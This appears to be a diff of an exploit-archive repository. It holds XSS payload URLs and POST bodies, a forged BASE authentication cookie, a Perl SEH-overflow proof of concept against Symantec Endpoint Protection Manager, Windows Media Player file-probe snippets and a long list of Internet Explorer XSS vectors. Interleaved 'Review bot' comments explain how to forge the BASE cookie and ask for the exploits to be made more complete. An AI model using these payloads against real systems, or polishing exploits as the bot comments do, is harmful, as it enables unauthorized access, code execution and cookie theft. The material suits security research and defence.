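Review bot: the single iframe line depends on what http://www.example.com/safari/safari2.html does, and that page is never described; the trick is that the embedding document overwrites the child's contentWindow.parent and .top with "alert", so the framed page has to reference parent or top for anything to fire. Spell out what safari2.html must contain (and that it can be cross-origin, which is the point), and add the affected-version line the other entries have.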


@ -72,4 +72,4 @@ mysql root, facebook/twitter accounts and so on.
---
Exploit: http://www.exploit-db.com/sploits/32618.tgz
Exploit-DB mirror: http://www.exploit-db.com/sploits/32618.tgz


@ -22,5 +22,5 @@ Cheers!
# - A valid account as at least a user
# - The target to have outgoing internet connectivity
Exploit: http://www.exploit-db.com/sploits/24480.tar.gz
Exploit-DB mirror: http://www.exploit-db.com/sploits/24480.tar.gz

platforms/php/webapps/33038.txt Executable file

@ -0,0 +1,28 @@
source: http://www.securityfocus.com/bid/35368/info
Webmedia Explorer is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Webmedia Explorer 5.0.9 and 5.10.0 are vulnerable; other versions may also be affected.
http://www.example.com/webmediaexpl/htdocs/index.php?search=" onmouseover=alert(0) ---
http://www.example.com/webmediaexpl/htdocs/?view=2&thisisnotarealcall=&#039;)" onmouseover=alert(0) > ---
http://www.example.com/webmediaexpl/htdocs/index.php?dir=&bookmark=" onmouseover=alert(0) > ---&action=edit
POST Method - Cross Site Scripting:
Host: [HOST]
User-Agent: FireFox-3-RoXx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
http://[HOST]/webmediaexpl/htdocs/index.php?action=remember
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Post Content:
email=%22+onmouseover%3Dalert%280%29+%3E+---&captcha_code=
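Review bot: the POST example has headers and a body but no request line, so the target path is only recoverable by guessing from the Referer (index.php?action=remember); add the "POST ... HTTP/1.1" line above Host. The second GET URI also contains "&#039;", an HTML entity for a single quote left over from the advisory's HTML rendering, which should be a literal apostrophe (or %27) in a URL. Content-Length: 58 does match the 58-byte body shown.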

platforms/php/webapps/33052.txt Executable file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/35470/info
Basic Analysis And Security Engine (BASE) is prone to an authentication-bypass vulnerability.
An attacker can exploit this issue to gain unauthorized access to the affected application. Successfully exploiting this issue will lead to other attacks.
BASE 1.2.4 is vulnerable; prior versions are also affected.
The following examples are available:
echo -n 10000nidemBASEUserRole | md5sum
javascript:document.cookie="BASERole=10000|nidem|794b69ad33015df95578d5f4a19d390e; path=/"
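Review bot: the two lines need a sentence tying them together: the cookie is role_id|username|md5(role_id . username . "BASEUserRole"), with the constant string "BASEUserRole" as the only secret, which is why the hash can be precomputed for any role/user pair (10000 and nidem here) and planted with the javascript: bookmarklet. Also say that the cookie path must match the BASE install path and that the role id and username are the values the attacker wants to impersonate, not fixed accounts.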


@ -2,5 +2,5 @@ Source: http://packetstormsecurity.org/files/115908/sysret.rar
This is proof of concept code that demonstrates the Microsoft Windows kernel (Intel/x64) SYSRET vulnerability as described in MS12-042. The shellcode disables code signing and will grant NT SYSTEM privileges to a specified application or already running process.
Exploit: http://www.exploit-db.com/sploits/20861.rar
Exploit-DB mirror: http://www.exploit-db.com/sploits/20861.rar


@ -14,4 +14,4 @@ Foxit Reader is prone to a remote code-execution vulnerability because is fails
An attacker can exploit this issue by supplying a malicious PDF file or webpage. Successful exploits may allow the attacker to execute arbitrary code in the context of a user running the affected application. Failed attempts will likely result in denial-of-service conditions.
Exploit: http://www.exploit-db.com/sploits/2009-11-22-36668.tar
Exploit-DB mirror: http://www.exploit-db.com/sploits/2009-11-22-36668.tar


@ -76,4 +76,4 @@ libmpgatofixed32_plugin+0x00000000000016b4 (Hash=0xf1ffd179.0x98f1d37c)
176efdb4 000003e8
Crafted avs file: http://www.exploit-db.com/sploits/31899.avs
Exploit-DB mirror: http://www.exploit-db.com/sploits/31899.avs

platforms/windows/dos/33056.pl Executable file

@ -0,0 +1,124 @@
## Exploit-DB mirror: http://www.exploit-db.com/sploits/33056-sepm-secars-poc-v0.3.tar.gz
#!/usr/bin/perl -w
# Exploit Title: Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC
# Date: 31 January 2013
# Exploit Author: st3n@funoverip.net (a.k.a. jerome.nokin@gmail.com)
# Vendor Homepage: http://http://www.symantec.com/en/uk/endpoint-protection
# Version: 12.1.0 -> 12.1.2
# Tested on: Windows 2003 Enterprise Edition SP2
# CVE : CVE-2013-1612
# More info on: http://funoverip.net/?p=1693
#
#=====================================================================================
#
# This POC code overwrite EIP with "CCCCCCCC"
#
# About KCS Key: That key is used to obfuscate traffic between client and server.
# The key is generated during SEPM installation.
# We need that key to talk with the SEPM server..
#
# Where to find KCS Key ?
# On a managed client station. Search for "Kcs" inside:
#
# - Win7/Vista/W2k8/and more :
# C:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\CurrentVersion\\Data\\Config\\SyLink.xml
# - Windows XP :
# C:\\Document & Settings\\All Users\\Application Data\\Symantec\\Symantec Endpoint Protection\\
# CurrentVersion\\Data\\Config\\SyLink.xml
#
# On server side, check the logs:
# C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\data\\inbox\\log\\ersecreg.log
#=====================================================================================
use warnings;
use strict;
use IO::Socket::INET;
use SEPM::SEPM;
# SEP Manager host/ip
my $host = "192.168.60.186";
my $port = 8014;
# Kcs key
my $Kcs_hex = "85FB05B288B45D92447A3EDCBEFC434E";
# ---- config end -----
# flush after every write
$| = 1;
# Send HTTP request function
sub send_request {
my $param = shift; # URL parameters
my $post_data = shift; # POST DATA
my $sock = IO::Socket::INET->new("$host:$port");
if($sock){
print "Connected.. \n";
# HTTP request
my $req =
"POST /secars/secars.dll?h=$param HTTP/1.0\r\n" .
"User-Agent: Smc\r\n" .
"Host: $host\r\n" .
"Content-Length: " . length($post_data) . "\r\n" .
"\r\n" .
$post_data ;
# Sending
print $sock $req;
# Read HTTP response
my $resp = '';
while(<$sock>){ $resp .=$_; }
#print $resp;
if($resp =~ /400 Bad Request/) {
print "\nERROR: Got '400 Bad Request' from the server. Wrong Kcs key ? Wrong SEP version ?\n";
}
close $sock;
}
}
# SEP object
my $sep = SEPM::SEPM->new();
print "[*] Target: $host:$port\n";
print "[*] KCS Key: $Kcs_hex\n";
# SEPM object for obfuscation
print "[*] Generating master encryption key\n";
$sep->genkey($Kcs_hex);
# Obfuscate URL parameters
print "[*] Encrypting URI\n";
my $h = $sep->obfuscate("l=9&action=26");
# The evil buff
print "[*] Building evil buffer\n";
my $buf =
"foo=[hex]" . # [hex] call the vulnerable parsing function
"F" x 1288 . # Junk
"B" x 8 . # Pointer to next SEH record
"CCCCCCCC". # SEH Handler, will overwrite EIP register
"D" x 500; # Trigger "Memory Access Violation" exception
# Sending request
print "[*] Sending HTTP request\n";
send_request($h, # URL parameters
$buf # post data
);
print "[*] Done\n";
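Review bot: two documentation slips in the header block should be fixed before this lands, since defenders use that header to locate the config file: the Vendor Homepage URL carries a doubled scheme (`http://http://www.symantec.com/...`), and the Windows XP path names the folder `Document & Settings`, whereas the real folder is `Documents and Settings`, so the SyLink.xml location given for XP will not resolve as written. Separately, `send_request` only acts inside `if($sock){ ... }`; when `IO::Socket::INET->new` fails the branch is skipped silently and the script still prints `[*] Done`, so an `else` that reports the failed connect (e.g. `print "ERROR: connect to $host:$port failed: $@\n";`) would make a wrong host/port distinguishable from a request that was actually sent.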

View file

@ -16,5 +16,5 @@
# also check here for The Persian docs of this methods and more :
http://www.0days.ir/article/
Exploit: http://www.exploit-db.com/sploits/cve-2011-0611_exploit.pdf
Exploit-DB mirror: http://www.exploit-db.com/sploits/cve-2011-0611_exploit.pdf

View file

@ -10,17 +10,15 @@ Exploit
# It gracefully bypass DEP/ASLR in MS Office 2010,
# and we named this method "Ikazuchi DEP/ASRL Bypass" : >
# unfortunately msgr3en.dll loads a few seconds after opining office,
# so just need to open open Office , and then open exploit after a few
second and saw a nice calc.
# so just need to open open Office , and then open exploit after a few second and saw a nice calc.
#
# The Arashi : http://abysssec.com/files/The_Arashi.pdf
http://www.exploit-db.com/download_pdf/17469
# http://www.exploit-db.com/download_pdf/17469
#
# me : twitter.com/ponez
# aslo check here for Persian docs of this methods and more :
http://www.0days.ir/article/
# http://www.0days.ir/article/
Exploit: http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc
#
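Review bot: the re-joined comment line this hunk adds (`# so just need to open open Office , and then open exploit after a few second and saw a nice calc.`) keeps the typos of the two lines it replaces, so the same pass could correct them: "open open" is doubled, "opining" in the preceding line should read "opening", "second" should be "seconds", and "aslo" in the Persian-docs line should be "also"; a cleaned version of the added line would be `# so just need to open Office, and then open the exploit after a few seconds and see a nice calc.`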
@ -147,4 +145,8 @@ stores in stack :D
RETN
# KABOOM !!!
Exploit: http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc
Exploit-DB mirror: http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc

View file

@ -3,7 +3,7 @@ Somehow, our script got on to the Russian forums :/
@w3bd3vil and @abh1sek
Exploit: http://www.exploit-db.com/sploits/29881.tar.gz
Exploit-DB mirror: http://www.exploit-db.com/sploits/29881.tar.gz
Adobe Acrobat Reader ASLR/DEP bypass Exploit with SANDBOX BYPASS
=================================================================

View file

@ -32,4 +32,4 @@ Trendmicro, CDC
Exploit: http://www.exploit-db.com/sploits/30007.zip
Exploit-DB mirror: http://www.exploit-db.com/sploits/30007.zip

View file

@ -30,4 +30,4 @@ The expolit is in the file attatchment named shellcode.txt
2? Select all the content in the editor
3? Click Menu Plugins->CCompletion->Go to identifier (Open in firt view) F11
Exploit: http://www.exploit-db.com/sploits/31895.7z
Exploit-DB mirror: http://www.exploit-db.com/sploits/31895.7z

View file

@ -19,6 +19,7 @@
which allows remote attackers to execute arbitrary code by accessing an object that (1)
was not properly initialized or (2) is deleted, aka "Time Element Memory Corruption Vulnerability."
Download Exploit : http://www.exploit-db.com/sploits/20547.rar
Exploit-DB mirror: http://www.exploit-db.com/sploits/20547.rar

View file

@ -8,7 +8,7 @@ Version: 0.3z R2
Tested on: Windows XP SP3, Windows 7 Ultimate SP1, Windows Server 2003,
Windows Server 2008, it should work on all Windows.
Full Exploit: http://www.exploit-db.com/sploits/20758.tar.gz
Exploit-DB mirror: http://www.exploit-db.com/sploits/20758.tar.gz
*/
#include "main.h"

View file

@ -13,7 +13,7 @@
Generation:
c:\mxmlc\bin>mxmlc.exe AsXploit.as -o AsXploit.swf
E-DB Note: http://www.exploit-db.com/sploits/32851-AsXploit.as
Exploit-DB mirror: http://www.exploit-db.com/sploits/32851-AsXploit.as
-->

View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/35335/info
Microsoft Windows Media Player is prone to multiple information-disclosure vulnerabilities because it fails to properly restrict access to certain functionality when handling media files.
An attacker can exploit these vulnerabilities to obtain information that may aid in further attacks.
<ASX version="3.0">
<ENTRY>
<REF href="file://c:/test.wma"/>
</ENTRY>
</ASX>
The following command may be used to discover hosts:
file://\\<IP>\c$\a.mp3

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/35455/info
Microsoft Internet Explorer is prone to a security-bypass vulnerability because it fails to properly enforce restrictions on script behavior.
An attacker may exploit this issue to bypass restrictions on the execution of JavaScript code. This may aid in further attacks.
<STYLE>@import 'javascript:alert("xss1")';</STYLE> <IMG SRC=javascript:alert('XSS2')> <BODY BACKGROUND="javascript:alert('XSS3')"> <LINK REL="stylesheet" HREF="javascript:alert('XSS4');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');"> <IFRAME SRC="javascript:alert('XSS6');"></IFRAME> <DIV STYLE="background-image: url(javascript:alert('XSS7'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS8')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS9')")}</STYLE> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS10')></OBJECT> <STYLE>@import'http://example.com/xss.css';</STYLE> <script SRC="javascript:alert('xss11');"></script> <video SRC="javascript:alert('xss12');"</video> <LAYER SRC="javascript:alert('xss13')"></LAYER> <embed src="javascript:alert('xss14')" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed> <applet src="javascript:alert('xss15')" type=text/html>